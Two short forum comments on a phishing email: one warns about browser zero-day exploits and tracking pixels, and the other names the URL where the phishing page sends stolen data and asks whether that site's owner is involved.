Comment: a) There's always a chance of zero-day exploits against your browser b) sending requests to dubious sites might already count as compromising personal information - tracking pixels (etc) let them know that you opened the email.

Comment: Looking at the code to where the phished info is sent to, it's: `http://miller-farms.com/redirecting_please_wait.php`. Does this imply that the server owner is involved with the hack?